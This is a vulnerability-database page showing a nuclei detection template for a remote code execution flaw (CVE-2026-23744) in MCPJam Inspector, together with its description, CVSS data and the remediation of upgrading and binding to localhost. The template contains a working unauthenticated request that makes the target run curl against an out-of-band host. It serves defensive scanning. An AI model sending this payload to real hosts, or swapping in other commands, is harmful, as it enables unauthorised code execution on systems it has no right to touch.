Lucene search
K

MCPJam Inspector - Remote Code Execution

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 58 Views

MCPJam Inspector RCE via /api/mcp/connect; upgrade to 1.4.3 and bind to localhost.

Related
Refs
Code
id: CVE-2026-23744

info:
  name: MCPJam Inspector - Remote Code Execution
  author: Louay-075
  severity: critical
  description: |
    MCPJam inspector is the local-first development platform for MCP servers. The Latest version 1.4.2 and earlier are vulnerable to a remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
  impact: |
    An unauthenticated attacker can remotely execute arbitrary system commands via the exposed /api/mcp/connect endpoint. Successful exploitation leads to full compromise of the affected host.
  remediation: |
    Upgrade MCPJam Inspector to version 1.4.3 or later. Restrict the service to listen on 127.0.0.1.
  reference:
    - https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
    - https://github.com/advisories/GHSA-232v-j27c-5pp6
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23744
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-23744
    epss-score: 0.38374
    epss-percentile: 0.98384
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: mcpjam
    product: mcpjam
  tags: cve,cve2026,rce,mcpjam,oast,ai,vkev

http:
  - raw:
      - |
        POST /api/mcp/connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"serverConfig":{"timeout":10000,"command":"curl","args":["{{interactsh-url}}"],"env":{}},"serverId":"mymcp"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Connection failed for server", "MCP error")'
          - 'contains(content_type, "application/json")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 500'
        condition: and
# digest: 4a0a00473045022007d1dd6a40b7b1c810dc7e28bcd373242148f4bc62fcd28dfea9fc96362e381d0221008118e60646ac0428fd554b094d28aa403c2d37290fde9657b94fb4fbcc552f67:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jan 2026 14:53Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.19.8
EPSS0.38374
SSVC
58